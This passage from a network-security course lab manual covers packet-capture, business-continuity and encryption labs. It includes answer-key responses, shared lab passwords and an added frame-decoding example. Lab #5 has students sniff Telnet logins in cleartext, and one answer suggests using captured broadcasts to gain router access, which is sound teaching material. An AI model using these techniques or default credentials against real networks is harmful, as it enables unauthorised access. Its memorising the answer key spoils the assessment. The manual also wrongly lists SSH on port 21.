TFTP (Tftpd32 TFTP Server)
o Port: 69
o Username:
o Password:
7. Power up, in VMware Player, the TargetUbuntu01 VM server and SSH logon using the provided credentials:
Ubuntu Server Target VM - TargetUbuntu01
Ubuntu Linux 10.04 LTS Server (VM Name: TargetUbuntu01)
o Computer Name: Ubuntu01
o ONE User available ONLY in v1: administrator
o Three Users available in v2: administrator, student or instructor
o Password: ISS316Security (case sensitive)
o IP Address: eth0 set to DHCP, eth1 and eth2 not set.
SSH
o Port: 21
o Username: administrator
o Password: ISS316Security (case sensitive)
Apache running Damn Vulnerable Web App (DVWA)
o URL: http:///dvwa
o Password: password
o Username: admin
8. Identify the target network device IP addresses from the following chart:
9. Load Wireshark and start a packet capture in promiscuous mode while you perform the various traffic generating tasks
10. From your DOS command prompt, make sure you can ping the destination IP address before you attempt to TELNET, SSH, TFTP, or FTP to the destination host, as follows:
Ping 172.30.0.___ (your IP host address allocated by the DHCP server)
Ping 172.30.0.10 (the DHCP server)
Ping 172.30.0.1 (the IP default gateway router)
Ping 172.X.X.X (where 172.X.X.X = IP destination address; refer to the IP Address Chart in Step #8)
11. Run the PuTTY application from the Instructor VM workstation and enter the targeted IP addresses for your TELNET and SSH exercise:
a. TELNET to LAN Switch 1 and enter the userid and password of cisco / cisco
b. TELNET to Indy and enter the userid and password of cisco / cisco
c. TELNET to Tampa and enter the userid and password of cisco / cisco
d. SSH to LAN Switch 2 (only for 2960s that support SSH) and enter the userid and password of cisco / cisco
e. SSH to the TargetUbuntu01 VM server (172.30.0.X: check the DHCP server for the IP host address or ask the Instructor what the IP host address is) and enter the SSH (port 21) login credentials:
o Port: 21
o Username: administrator
o Password: ISS316Security (case sensitive)
f. SSH to WestCovina (if SSH is enabled) and enter the userid and password of cisco / cisco
g. Click on TFTPd32 on your desktop and load the client on your student VM workstation. TFTP a small file from your Student VM workstation to the TFTPd32 Server on the TargetWindows01 VM server (172.30.0.X: ask your instructor for the allocated IP host address of the TargetWindows01 VM server)
h. Click on Filezilla FTP on your desktop and load the client FTP application on your student VM workstation. FTP a small file from your Student VM workstation to the FileZilla FTP server on the TargetWindows01 VM server (172.30.0.X: ask your instructor for the allocated IP host address of the TargetWindows01 VM server)
12. Stop Capture in Wireshark, save the file as IT255 Lab #5.pcap, and submit it as part of your lab deliverables; review the protocol decode and answer the Lab #5 assessment questions
13. Import the IT255 Lab #5.pcap file into Netwitness Investigator by first creating a new local connection called IT255 Lab #5.pcap. Then import the *.pcap file into Netwitness Investigator for further protocol analysis

Deliverables
Upon completion of the packet capture and protocol analysis, students are required to provide the following deliverables as part of this lab:
1. Lab #5 Wireshark Protocol Capture File IT255 Lab #5.pcap
2. Lab #5 Submit a screenshot of the *.pcap file imported into Netwitness Investigator (Print Screen, then copy and paste into a Word document).
3. Lab #5 Lab Assessment Questions & Answers

Evaluation Criteria and Rubrics
The following are the evaluation criteria and rubrics for Lab #5 that the students must perform:
Was the student able to use Wireshark & Netwitness Investigator as packet capture and protocol analysis tools? [20%]
Was the student able to capture live IP, ICMP, TCP and UDP traffic using TELNET, FTP, TFTP, and SSH sessions and distinguish them? [20%]
Was the student able to examine captured packet traces to view clear-text and cipher-text data? [20%]
Was the student able to analyze the packet capture data in Wireshark or Netwitness Investigator and identify the difference between UDP and TCP sessions? [20%]
Was the student able to identify common network-related protocols used for client-server communications, network management and network security? [20%]
Lab #5 Assessment Worksheet
Perform Protocol Capture & Analysis Using Wireshark & Netwitness Investigator
Course Name & Number: ______________________________________________________________
Student Name: _______________________________________________________________________
Instructor Name: _____________________________________________________________________
LAB Due Date: _______________________________________________________________________

Overview
One of the most important tools needed by information systems security practitioners is a packet capture and protocol analysis tool. Wireshark is a freeware tool providing basic packet capture and protocol decoding capabilities. NetWitness Investigator is a free and commercial solution (the free version allows up to twenty 1 GB collections of packet captures) that provides security practitioners with a deep packet inspection tool for examining everything from the data link layer up to the application layer. NetWitness Investigator is the only protocol analysis tool that provides deep packet inspection and advanced decoding for simplified full packet capture and session analysis.

LAB Assessment Questions & Answers
1. What is the purpose of the Address Resolution Protocol (ARP)?
A protocol used to resolve, or map, an IP address to a MAC-layer address so IP packets can communicate on an Ethernet LAN.
2. What is the purpose of the Dynamic Host Configuration Protocol (DHCP)?
A protocol used by connecting workstations to request an IP address from a DHCP server.
3. What was the DHCP-allocated source IP host address for the Student VM and Target VM?
{Unique for each Student workstation}
4. When you pinged the targeted IP host, what was the source IP address and destination IP address of the ICMP echo-request packet?
{Unique for each Student workstation}
5. Did the targeted IP host respond to the ICMP echo-request packet with an ICMP echo-reply packet? If yes, how many ICMP echo-reply packets were sent back to the IP source?
{Unique for each Student workstation}
6. Find a TCP 3-way handshake for a TELNET, FTP, or SSH session. What is the significance of the TCP 3-way handshake?
A connection-oriented acknowledgement between source and destination that the TCP connection is now valid.
7. What was the SEQ# of the initial SYN TCP packet and the ACK# of the SYN ACK TCP packet?
SEQ# = 0, ACK# = 1
8. During the Instructor's TELNET session to LAN Switch 1 and LAN Switch 2, what was the captured terminal password for LAN Switch 1 and LAN Switch 2?
cisco
9. When the Instructor used SSH to a Cisco router, were you able to see the terminal password? Why or why not?
No. SSH encrypts the data transmission between the SSH client and SSH host, maintaining confidentiality.
10. What other IP packets are on the VLAN and Ethernet LAN segment? How can these other IP packets provide additional clues or information about the logical IP routing and IP addressing schema?
EIGRP broadcasts, DHCP broadcasts, ARP broadcasts, Cisco Ethernet interface CDP neighbor broadcasts, etc. By examining the MAC-layer addresses and IP address information of these packets, the IP subnetwork numbers and IP host addresses of the adjacent switch and router interfaces can be identified. Using this information may provide TELNET or SSH access to the Cisco switch or router, providing additional information about the adjacent switch and router connections and the overall IP network.
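What the capture steps (11 through 13) produce and what worksheet questions 6 through 9 ask about can be reproduced without the classroom network with the following decoder. This is an added example, not code from the lab manual or from Jones & Bartlett, and it does not read a real .pcap: it builds a handful of constructed Ethernet/IPv4 frames (addresses 172.30.0.50 and 172.30.0.60 in the lab's DHCP range, ports, initial sequence numbers and payloads are all made up), decodes them from the Data Link layer up to the Transport layer, prints Wireshark-style relative SEQ/ACK numbers for the TCP 3-way handshake, shows that a UDP datagram (TFTP) has no handshake at all, and reports which observed services carry logins in the clear versus encrypted. The builders, the Packet class and the port tables are assumptions of this example.

```python
"""Added example, not from the lab manual: decode constructed Ethernet/IPv4/TCP/UDP
frames the way Wireshark does for Lab #5 (relative SEQ/ACK for the 3-way handshake,
TCP vs UDP sessions, clear-text vs encrypted services). All values are constructed."""
import struct
from dataclasses import dataclass
from typing import Dict, List, Tuple

ETH_HDR = 14
CLEARTEXT_PORTS = {21: "FTP", 23: "TELNET", 69: "TFTP"}   # logins readable in a trace
ENCRYPTED_PORTS = {22: "SSH"}                              # payload ciphered (worksheet Q9)
FLAG_NAMES = [(0x02, "SYN"), (0x08, "PSH"), (0x01, "FIN"), (0x04, "RST"), (0x10, "ACK")]

@dataclass
class Packet:
    src: str
    dst: str
    proto: str
    sport: int
    dport: int
    flags: str = ""
    seq: int = 0
    ack: int = 0
    payload: bytes = b""

# --- constructed-frame builders (sample input only; checksums left at zero) ---
def build_frame(src: str, dst: str, proto: int, l4: bytes) -> bytes:
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0x1234, 0x4000, 64, proto, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return eth + ip + l4

def build_tcp(sport, dport, seq, ack, flags, payload=b"") -> bytes:
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags,
                       8192, 0, 0) + payload

def build_udp(sport, dport, payload) -> bytes:
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload

# --- decoder: Data Link (Ethernet) -> Network (IP) -> Transport (TCP/UDP) ---
def parse_frame(frame: bytes) -> Packet:
    if frame[12:14] != b"\x08\x00":
        raise ValueError("not an IPv4 frame")
    ip = frame[ETH_HDR:]
    ihl, proto = (ip[0] & 0x0F) * 4, ip[9]
    src, dst = ".".join(map(str, ip[12:16])), ".".join(map(str, ip[16:20]))
    l4 = ip[ihl:]
    if proto == 6:
        sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", l4[:14])
        flags = "+".join(name for bit, name in FLAG_NAMES if off_flags & bit)
        return Packet(src, dst, "TCP", sport, dport, flags, seq, ack, l4[(off_flags >> 12) * 4:])
    if proto == 17:
        sport, dport, length, _ = struct.unpack("!HHHH", l4[:8])
        return Packet(src, dst, "UDP", sport, dport, payload=l4[8:length])
    return Packet(src, dst, f"IP proto {proto}", 0, 0)

def handshake_summary(packets: List[Packet]) -> List[Tuple[str, int, int]]:
    """Wireshark-style relative numbering: each direction's ISN (the SEQ of its SYN
    or SYN+ACK) becomes 0, so the SYN shows SEQ 0 and the SYN+ACK shows ACK 1
    (worksheet Q7). UDP has no handshake and is skipped."""
    isn: Dict[Tuple[str, int], int] = {}
    rows = []
    for p in packets:
        if p.proto != "TCP":
            continue
        me, peer = (p.src, p.sport), (p.dst, p.dport)
        if "SYN" in p.flags:
            isn[me] = p.seq
        rel_seq = p.seq - isn.get(me, p.seq)
        rel_ack = p.ack - isn.get(peer, p.ack) if "ACK" in p.flags else 0
        rows.append((p.flags, rel_seq, rel_ack))
    return rows

def cleartext_services(packets: List[Packet]) -> Dict[Tuple[str, int], str]:
    """Defender's view of the segment: which observed services expose logins."""
    seen = {}
    for p in packets:
        for port in (p.sport, p.dport):
            if port in CLEARTEXT_PORTS:
                seen[(p.proto, port)] = f"{CLEARTEXT_PORTS[port]}: cleartext"
            elif port in ENCRYPTED_PORTS:
                seen[(p.proto, port)] = f"{ENCRYPTED_PORTS[port]}: encrypted"
    return seen

def sample_capture() -> List[bytes]:
    """A constructed TELNET handshake plus login, a TFTP request and an SSH SYN."""
    c, s, c_isn, s_isn = "172.30.0.50", "172.30.0.60", 0x1A2B3C4D, 0x5E6F7081
    return [
        build_frame(c, s, 6, build_tcp(50000, 23, c_isn, 0, 0x02)),                    # SYN
        build_frame(s, c, 6, build_tcp(23, 50000, s_isn, c_isn + 1, 0x12)),            # SYN+ACK
        build_frame(c, s, 6, build_tcp(50000, 23, c_isn + 1, s_isn + 1, 0x10)),        # ACK
        build_frame(c, s, 6, build_tcp(50000, 23, c_isn + 1, s_isn + 1, 0x18, b"cisco\r\n")),  # TELNET data
        build_frame(c, s, 17, build_udp(50001, 69, b"\x00\x01lab.txt\x00octet\x00")),  # TFTP read request
        build_frame(c, s, 6, build_tcp(50002, 22, 0x0BADF00D, 0, 0x02)),               # SSH SYN
    ]

if __name__ == "__main__":
    pkts = [parse_frame(f) for f in sample_capture()]
    print(handshake_summary(pkts))
    print(cleartext_services(pkts))
```

The TELNET password in the fourth frame is visible as plain bytes in the decoded payload, which is exactly what question 8 expects students to find, while the SSH session shows only its handshake; the TFTP datagram appears with no flags and no sequence numbers, which is the TCP-versus-UDP distinction the rubric asks for. Wireshark's absolute sequence numbers differ on every run because each side picks a random ISN; the relative view is what makes the SYN read as 0 and the SYN+ACK's acknowledgement as 1.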
Laboratory #6
Lab #6: Perform Business Continuity Plan Implementation Planning

Learning Objectives and Outcomes
Upon completing this lab, students will be able to complete the following tasks:
Identify the major elements of a Business Continuity Plan (BCP) and requirements for a fictitious organization
Perform a high-level Business Impact Analysis (BIA) and Risk Analysis (RA) for a fictitious organization
Prioritize, from the BIA and RA, the business functions and processes that must be part of the business continuity plan
Craft a BCP plan outline that addresses the BIA and RA and business priorities
Define the necessary BCP implementation planning steps, including testing, practice, and documentation maintenance of back-up and recovery procedures

Required Setup and Tools
This is a paper-based, hands-on lab and does not require the use of the ISS Mock IT Infrastructure or Virtualized Server Farm. The following summarizes the setup, configuration, and equipment needed to perform Lab #6:
1. Standard ITT onsite student workstation must have the following software applications loaded to perform this lab:
a. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers and for crafting a BCP outline, BIA, and RA priorities
b. Fictitious organization business functions and processes spreadsheet

Recommended Procedures
Instructor Demo Lab #6:
The instructor will review the provided fictitious organization business functions and processes spreadsheet. From this list, a qualitative Business Impact Analysis (BIA) or Risk Analysis (RA) will be performed, prioritizing the identified business functions and processes. From this prioritization will come the prioritization for business continuity and recovery of the systems and the applications that support that business function or process. The instructor will review the main concepts and areas that must be addressed in your BIA, RA, and BCP, including the major elements needed within the BCP itself.

Hands-on Lab #6 Instructor Steps:
The instructor will lead the following classroom discussion to set the stage for the fictitious organization's Business Continuity Planning requirements.
1. Review the fictitious organization's business functions and processes
2. Distinguish between an RA and a BIA, and between a BCP and a DRP
3. Align the RA and BIA as the foundation for the priorities of your BCP and DRP
4. Assess business drivers for prioritization of the BCP and DRP business functions and processes
5. Discuss what the process would be to perform an RA and BIA
a. Develop information-gathering questionnaires
b. Conduct interviews and one-on-one meetings with business leaders and departmental managers of critical business functions and operations
c. Align business drivers with key business functions and processes
d. Prioritize the business-critical business functions and processes
e. Identify the IT systems, applications, and data that support the prioritized business functions and processes
f. Assess the financial impact these critical business functions and processes have on the business
6. Define the key business continuity metrics that drive the overall business continuity plan
a. Business risk analysis and business impact analysis prioritization of critical business functions and processes
b. Recovery Time Objectives (RTO) for critical business functions and processes
c. Financial loss versus cost of recovery impact analysis
7. Discuss how to define the scope of the BCP and how that scope can be narrowed based on mission-critical priorities and financial budgets
8. Discuss how business asset replacement insurance can impact the cost and investment of business continuity solutions
9. Review the major components of a business continuity plan:
a. BCP Policy
b. BCP Organizational Structure
c. Business Impact Analysis
d. IT Systems, Applications, & Data
e. BCP Drivers & Priorities
f. BCP Scope and Objectives
g. Business Functions & Processes Back-Up & Recovery
h. BCP Testing & Plan Updating
i. BCP Maintenance & On-Going Management
10. Review the elements of a BCP implementation plan
a. Initiating the BCP
b. Back-Up and Recovery Procedures for IT Systems, Applications, & Data
c. Key BCP Personnel and Organizational Structure
d. Prepare Key Documents, Tools, and Instructions for Recovery
e. Handling Emergencies or Disaster Recovery Situations
f. Manage Business Recovery
g. Perform Business Recovery Steps
h. Test the BCP
i. Train IT and Departmental Personnel on Business Recovery and Back-Up Procedures
j. Maintain and Update the BCP

Hands-on Lab #6 Student Steps:
The instructor will lead the following classroom discussion to set the stage for the fictitious organization's Business Continuity Planning requirements.
1. Review the fictitious organization's business functions and processes
2. Distinguish between an RA and a BIA, and between a BCP and a DRP
3. Align the RA and BIA as the foundation for the priorities of your BCP and DRP
4. Assess business drivers for prioritization of the BCP and DRP business functions and processes
5. Discuss what the process would be to perform an RA and BIA
a. Develop information-gathering questionnaires
b. Conduct interviews and one-on-one meetings with business leaders and departmental managers of critical business functions and operations
c. Align business drivers with key business functions and processes
d. Prioritize the business-critical business functions and processes
e. Identify the IT systems, applications, and data that support the prioritized business functions and processes
f. Assess the financial impact that these critical business functions and processes have on the business
6. Define the key business continuity metrics that drive the overall business continuity plan
a. Business risk analysis and business impact analysis prioritization of critical business functions and processes
b. Recovery Time Objectives (RTO) for critical business functions and processes
c. Financial loss versus cost of recovery impact analysis
7. Discuss how to define the scope of the BCP and how that scope can be narrowed based on mission-critical priorities and financial budgets
8. Discuss how business asset replacement insurance can impact the cost and investment of business continuity solutions
9. Review the major components of a business continuity plan:
a. BCP Policy
b. BCP Organizational Structure
c. Business Impact Analysis
d. IT Systems, Applications, & Data
e. BCP Drivers & Priorities
f. BCP Scope and Objectives
g. Business Functions & Processes Back-Up & Recovery
h. BCP Testing & Plan Updating
i. BCP Maintenance & On-Going Management
10. Review the elements of a BCP implementation plan
a. Initiating the BCP
b. Back-Up and Recovery Procedures for IT Systems, Applications, & Data
c. Key BCP Personnel and Organizational Structure
d. Prepare Key Documents, Tools, and Instructions for Recovery
e. Handling Emergencies or Disaster Recovery Situations
f. Manage Business Recovery
g. Perform Business Recovery Steps
h. Test the BCP
i. Train IT and Departmental Personnel on Business Recovery and Back-Up Procedures
j. Maintain and Update the BCP
Deliverables
Upon completion of this paper-based lab, students are required to submit the following deliverables:
1. Lab #6 Completed Business Recovery Strategy Assessment Spreadsheet
2. Lab #6 Create a BCP Plan Outline and Implementation Plan Outline for the Fictitious Organization
3. Lab #6 Lab Assessment Questions & Answers

Evaluation Criteria and Rubrics
The following are the evaluation criteria and rubrics for Lab #6 - Perform Business Continuity Plan Implementation Planning:
1. Was the student able to identify the major elements of a Business Continuity Plan (BCP) and requirements for a fictitious organization? [20%]
2. Was the student able to perform a high-level Business Impact Analysis (BIA) and Risk Analysis (RA) for a fictitious organization? [20%]
3. Was the student able to prioritize, from the BIA and RA, the business functions and processes that must be part of the business continuity plan? [20%]
4. Was the student able to craft a BCP plan outline that addresses the BIA and RA and business priorities? [20%]
5. Was the student able to define the necessary BCP implementation planning steps, including testing, practice, and documentation of back-up and recovery procedures? [20%]
Lab #6 Business Recovery Strategy Assessment Spreadsheet
e-Commerce/e-Business Organization
List of Key Business Functions & Processes
E-commerce processes - primary revenue source for the organization
E-mail based communications - internal for business communications and external for customer service
Telephone call center and on-line customer services - enhanced e-customer service delivery with call center and self-service customer website
Manufacturing and production line - just in time inventory and distribution of products
Production processes - just in time manufacturing and integrated supply chain
Quality control mechanisms - maximize product quality
Maintenance and support services - keep production lines open
Sales and sales administration - inside sales, online sales, sales support, resellers and distributors, etc.
Finance and accounting - G/L, A/R, A/P, Payroll, Benefits
Research and development activities - product development
Human resources management - employee services
Information technology services & Internet connectivity - supports e-commerce and e-business infrastructure
Premises (Head Office and branches) - headquarters facility and administration office
Marketing and public relations - internet marketing and branding
Lab #6 Business Recovery Strategy Assessment Spreadsheet
e-Commerce/e-Business Organization
List of Impacted IT Systems, Applications, & Data

Business Function or Process: IT Systems, Applications & Data
- E-mail based communications: POP3, SMTP Mail Servers
- Website and e-commerce website (Payroll for HR): Web Server, e-Commerce Server (Manual Payroll Processing or External)
- Telephone call center: VoIP Telephony Infrastructure
- Customer service: Customer Server System / CRM
- Manufacturing and production line: Automation System & Manufacturing
- Production processes: Production Scheduling System
- Quality control mechanisms: QC System
- Maintenance and support services: Maintenance & Support System
- Sales and sales administration: Sales Order Entry, Sales Support
- Finance and accounting: GL, A/R, A/P Accounting System
- Research and development activities: R&D System
- Human resources management: HR, Employment, Benefits
- Information technology services: 7-Domains of Typical IT Infrastructure (Website/Internet/Online)
- Internet connectivity & telephone service: Broadband Internet, VoIP System
- Premises (Head Office and branches): HQ LAN/VoIP/IT Infrastructure
- Marketing and public relations: Marketing Analysis System

Priority column values as listed: 3, 4, 7, 8, 12, 14, 6, 9, 17, 15, 2, 5, 13, 16, 10, 1

Lab #6 Assessment Worksheet
Perform Business Continuity Plan Implementation Planning

Course Name & Number: ______________________
Student Name: ______________________
Instructor Name: ______________________
LAB Due Date: ______________________

Overview

The instructor will lead the class in discussions pertaining to a business continuity plan. Key elements of a business continuity plan, starting with a risk analysis, a business impact analysis, and the alignment of critical business functions and processes, will be discussed. Students will craft a business continuity implementation plan outline as part of this lab's deliverables.

Lab Assessment Questions & Answers

1. What is the difference between a risk analysis (RA) and a business impact analysis (BIA)?

A risk analysis (RA) focuses on all aspects of risk assessment for an organization and is a necessary step to assess what kind and how much business insurance to obtain. A business impact analysis (BIA) focuses on identifying critical business functions and operations that must be part of a business continuity plan to maintain and maximize availability.

2. What is the difference between a Disaster Recovery Plan and a Business Continuity Plan?

A DRP is usually a subset of a BCP and defines how an organization is to handle major disasters, major outages, and emergency situations. When a disaster situation is declared, the DRP, not the BCP, is enacted to deal with the immediate emergency and handle the disaster situation as per the DRP procedures. A DRP deals with the immediate disaster situation and must achieve the RTO as defined in the BCP, usually at an alternate site or through triage, to restore immediate critical business functions and operations.

3. Typically, a business continuity plan is also a compilation or collection of other plans. What other plans might a BCP and all supporting documents include?

- Disaster recovery plan
- End-user recovery plan
- Contingency plan
- Emergency response plan
- Crisis management plan
- IT system recovery procedures (i.e., mission critical IT systems, applications, and data, VoIP / telephony infrastructure, Internet access, etc.)

4. What is the main difference between a Disaster Recovery Plan (DRP) and a Business Continuity Plan (BCP)?

A Disaster Recovery Plan (DRP) focuses on the recovery of IT systems, applications, and data in the event of a catastrophic disruption (fire) or disaster (hurricane) in which a major IT or data center outage occurs (physical damage or destruction). The immediate concern of a DRP is to bring up mission critical systems, applications, and data access as soon as possible, even if it is a temporary or short-term solution, while the rest of the Business Continuity Plan (BCP) kicks in. A BCP has a much broader scope and takes into account all business functions and processes, following the prioritization dictated by the BIA.

5. What is the purpose of a risk assessment and business impact analysis? Why is this an important first step in defining a BCP and DRP?

The purpose of a risk assessment (RA) is to identify the entire organization's risks and quantify the impact of the identified risks to the organization based on key business drivers (loss of life, loss of income, liability, exposure, etc.). The purpose of a business impact analysis (BIA) is to assess the impact of downtime for specific business functions or processes. The BIA prioritizes mission critical business functions and processes (i.e., sales, customer service, manufacturing, e-commerce website, etc.) so that recovery priorities can be set for the IT systems, applications, and data affected by an outage or downtime.

6. How does risk assessment (RA) relate to a business impact analysis for an organization?

The BIA is like conducting a risk assessment except that it is focused on identifying critical, major, and minor business functions and operations. Once you identify these business functions and operations, you must then prioritize them in terms of importance to maintaining operations. Thus, a BIA is a form of risk management and risk assessment because you are assessing and minimizing the risk associated with downtime or unavailable IT systems, applications, and resources. The BIA helps organizations mitigate the risk associated with downtime and unavailable IT resources for business continuity and disaster recovery of critical business functions and operations.

7. Given the list of identified mission critical business functions and processes, what kind of company would you say this organization is, and what do you think are its most important business processes and functions?

This organization is in the production manufacturing business, heavily dependent upon a supply chain infrastructure for just-in-time manufacturing and inventorying. The crux of this organization is its online sales through an e-commerce website and a sales support function to drive revenue and cash into the business. This type of business is heavily dependent upon maintaining its connection with its customers, in this case online through the Internet, supported by traditional sales through inside and outside sales professionals. Maintaining enhanced customer service delivery for both high-value customers (VIP) and low-value customers is critical to maximize customer retention and repeat purchases.

8. Given the prioritization list provided for the organization's identified business functions and processes, write an assessment of how this prioritization will impact the need for IT systems, applications, and data access.

The assessment should focus on revenue generation and minimization of loss of income. Coupled with that is the need for maintaining customer service delivery, whether online, by e-mail, by self-service on the website, or via the 800-number with the call center. The customer is king to this organization, and maximizing revenue and income supported by customer service delivery is what is driving this prioritization.

9. For the top 5 identified business functions and processes, what recovery time objective (RTO) would you recommend for this organization and why?

RTO - 8 hours or 1 business day. Given the real-time nature of this organization and its real-time online transactions and purchases, providing real-time customer service support and product shipping logistics is critical to this organization. While portions of the identified #1 - #5 business functions and processes can be supported with minimal IT infrastructure, it would be important to identify the minimum IT systems, applications, and data access needed to support the online e-commerce system, the customer service functions, and access to the customer relationship management (CRM) database.

10. Why is payroll for employees and Human Resources listed as a co-number 1 business priority?

It is a critical business priority to pay employees on time and on schedule. Many businesses and organizations use an external payroll and direct deposit function to keep their employees paid and happy no matter what the circumstances are within the business or organization. It is also a breach of contract or employment not to pay your employees when pay is due, so it would be imperative to ensure continuity of payroll for its employees.
Laboratory #7

Lab #7: Relate Windows Encryption and Hashing to Confidentiality & Integrity

Learning Objectives and Outcomes

Upon completing this lab, students will be able to:
- Apply the concepts of using common cryptographic and encryption techniques to ensure confidentiality
- Apply the concepts of hashing to ensure integrity of data transmission and data reception
- Identify the output of common cryptographic and hashing tools on transmitted data and verify confidentiality and integrity
- Implement an MD5 sum or SHA1 hash on a data transmission or message to verify data transmission integrity
- Implement GPG for Windows to encrypt a data message to ensure confidentiality

Required Setup and Tools

This lab does not require the use of the ISS Mock IT Infrastructure - Cisco core backbone network. In addition, the Instructor VM workstation and Student VM workstations should be physically disconnected from the ITT internal network and be isolated on a dedicated layer 2 switch. This will allow a shared DHCP server to be used to allocate the IP addresses for the instructor and student workstations.

The following is required for this hands-on lab:

A) A classroom workstation (with at least 4 GB RAM) capable of supporting an insertable hard drive or USB hard drive with a pre-configured, virtualized server farm. This classroom workstation will support the virtualized server farm connected to the classroom layer 2 switch.
B) An instructor workstation (with at least 2 GB RAM) that shall act as the Instructor's demo lab workstation. The instructor will display the Instructor workstation on the LCD projector to demo the loading and configuring of the Instructor VM Workstation and VM Server Farm with VMware Player.
C) Students' lab workstations will run their own Student VM and VM Server Farm to run the Target VMs.

The following summarizes the setup, configuration, and equipment needed to perform Lab #7:

1. The VM server farm with:
   a. The Microsoft WindowsDHCP01 VM server enabled for allocating student IP host addresses
   b. The Instructor VM for the instructor and the Student VM for the students
2. Target VMs as described by the Lab:
   a. Windows 2003 Server TargetWindows01 VM server
   b. Instructor and Student VM with GPG installed
3. Standard ITT onsite student workstation must have the following software applications loaded to perform this lab:
   a. VMware Player 3.x
   b. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers

Recommended Procedures

Instructor Demo Lab #7:

The instructor will demonstrate common hashing and encryption tools, including MD5, SHA1, hash modifications, and the open-source GPG encryption tool. Using the new Instructor VM workstation and the TargetWindows01 VM server, the instructor will demonstrate the following:
- Execute the MD5 and SHA1 hashing tools on the TargetWindows01 VM server to generate a unique hash for a sample file
- Modify the sample file and then run the MD5 and SHA1 hashing tools against the new file, showing what happens to the cryptographic hash value
- Verify that the sample file has been altered, given the new MD5 and SHA1 hash calculated for the altered sample file
- Execute the GPG encryption / decryption application, apply it to a secret message, and verify the creation and sharing of public and private keys

Hands-on Lab #7 Instructor Steps:

The instructor will provide the following demonstration using the Instructor VM workstation and the TargetWindows01 VM server in this hands-on lab. This VM can be pre-loaded into VMware Player along with the Instructor VM workstation or Student VM workstation and can fit within 2 GB RAM with both VMs powered on.

1. Connect the instructor-removable hard drive to your workstation
2. Boot up the Instructor VM and the Microsoft DHCP VM server to allocate an IP host address
3. Connect the Instructor VM workstation to the LCD overhead projector for classroom display
4. Open a command prompt, type ipconfig, and ping your allocated IP host address 172.30.0.__, the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1
5. Log in to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch:
   Login ID: instructor or student (case sensitive)
   Password: ISS316Security (case sensitive)
   NOTE: If the workstations in your physical classroom have only 2 GB of RAM, then only two VMs can be powered on at once. You can load your Instructor VM and the TargetWindows01 VM server simultaneously. Obtain an IP host address from the DHCP server connected to the same layer 2 classroom switch to maximize performance.
6. Power up the TargetWindows01 VM server in VMware Player and log on using the provided credentials:
   Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01)
   o Computer Name: Windows02
   o Three Users Available: administrator, instructor or student (case sensitive)
   o Password: ISS316Security
   o IP Address: DHCP
   o Domain Login: NO
   FTP (Filezilla FTP Server)
   o Port: 21
   o Username: instructor or student
   o Password:
   TFTP (Tftpd32 TFTP Server)
   o Port: 69
   o Username:
   o Password:
7. GPG should already be pre-installed and located on the desktop of the Instructor VM workstation and the TargetWindows01 VM server.
   Note: If GPG is not on your desktop, look inside your \vlabs folder on the c:\ drive for the GPG install file. Install the GPG application with all the default installation configuration values.
8. Click on the GPG desktop icon to create your private key (Screen #1)
9. When asked for a name, enter Instructor or Student, and click Forward
10. To create a unique private key, enter your individual e-mail address (e.g., student01@vlabsolutions.com) and click Forward
11. Create a backup copy of your new key when prompted and click Forward
12. Enter a passphrase to further encrypt your newly created key (this is your secret key). Write down this passphrase, as it will be needed to decrypt and encrypt messages
13. After generation of your key, save it to the desktop for quick access
14. Click on Close and open GPG again. Highlight the key you just created, click on the Export option, and name the key InstructorVM or StudentVM as appropriate
15. Repeat the steps above to create a public key for the TargetWindows01 VM.
16. Click on the TargetWinVM01 key, click on the Export option, and name the key TargetVM01
17. Transfer both sets of keys to each of the VMs by copying, cutting, and pasting, or use an external USB hard drive, to ensure the public keys are transferred to both the Instructor VM and the TargetWindows01 VM server
18. Use the GPG Import button to import the public keys on both VMs
19. On the Instructor VM or Student VM, right-click the newly imported key, click on the Set Owner Trust option, and set it to Full in the options selection
20. On the Student VM, right-click the newly imported key, click on the Sign Keys option, and enter the secret key passphrase from the earlier generation to sign the public key into your secret key ring as authorized
21. For hashing, we can verify the public key was imported correctly into both the Instructor VM workstation and the TargetWindows01 VM server. Integrity is maintained if the hash value matches the Fingerprint in the GPG home window
22. On the Instructor VM, create a new file on the desktop using Notepad, name the file IT255 Lab #7.txt, and add the message "I like information systems security" in the text file
23. Save the IT255 Lab #7.txt file, right-click it, and choose the Sign and Encrypt option. Ensure you check the Remove Unencrypted File option at the bottom (refer to Screen #3)
24. Add both certificates (keys) to the Options and click Encrypt! (refer to Screen #4)
25. Once encrypted, you will see the encrypted file replace the plain text file on the desktop; right-click it and choose the Decrypt/Verify option (refer to Screen #5)
26. Now transfer the encrypted file to the TargetWindows01 VM server desktop and perform steps similar to Steps #22 - #25 to decrypt (not encrypt) the file just received on the TargetWindows01 VM server

Hands-on Lab #7 Student Steps:

To perform this hands-on lab, students are required to perform the following steps:

1. Connect the student-removable hard drive to your workstation
2. Boot up the Student VM and the Microsoft DHCP VM server to allocate an IP host address
3. Connect the Student VM workstation to the LCD overhead projector for classroom display
4. Open a command prompt, type ipconfig, and ping your allocated IP host address 172.30.0.__, the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1
5. Log in to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch:
   Login ID: student (case sensitive)
   Password: ISS316Security (case sensitive)
   NOTE: If the workstations in your physical classroom have only 2 GB of RAM, then only two VMs can be powered on at once. You can load your Instructor VM and the TargetWindows01 VM server simultaneously.
   Obtain an IP host address from the DHCP server connected to the same layer 2 classroom switch to maximize performance.
6. Power up the TargetWindows01 VM server in VMware Player and log on using the provided credentials:
   Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01)
   o Computer Name: Windows02
   o Three Users Available: administrator, instructor or student (case sensitive)
   o Password: ISS316Security
   o IP Address: DHCP
   o Domain Login: NO
   FTP (Filezilla FTP Server)
   o Port: 21
   o Username: instructor or student
   o Password:
